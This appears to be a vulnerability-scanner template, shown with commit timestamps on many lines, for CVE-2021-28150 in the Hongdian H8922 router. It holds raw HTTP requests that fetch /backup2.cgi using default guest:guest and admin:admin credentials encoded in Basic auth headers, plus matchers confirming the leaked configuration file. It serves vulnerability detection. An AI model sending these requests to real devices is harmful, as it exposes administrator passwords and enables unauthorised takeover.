2021-07-10 12:16:35 +00:00
id : CVE-2021-28150
info :
2023-02-01 17:34:41 +00:00
name : Hongdian H8922 3.0.5 - Information Disclosure
2021-07-10 12:16:35 +00:00
author : gy741
severity : medium
2023-02-01 18:27:43 +00:00
description : Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2021-08-18 11:37:49 +00:00
reference :
2021-07-10 13:15:09 +00:00
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
2022-05-17 09:18:12 +00:00
- http://en.hongdian.com/Products/Details/H8922
2023-02-01 17:28:44 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-28150
cwe-id : CWE-20
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,hongdian,exposure
2021-07-10 12:16:35 +00:00
requests :
- raw :
- |
GET /backup2.cgi HTTP/1.1
Host : {{Hostname}}
Authorization : Basic Z3Vlc3Q6Z3Vlc3Q=
- |
GET /backup2.cgi HTTP/1.1
Host : {{Hostname}}
Authorization : Basic YWRtaW46YWRtaW4=
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "application/octet-stream"
part : header
- type : word
words :
- "CLI configuration saved from vty"
2021-07-10 13:15:09 +00:00
- "service webadmin"
2023-02-01 17:28:44 +00:00
part : body
# Enhanced by md on 2023/02/01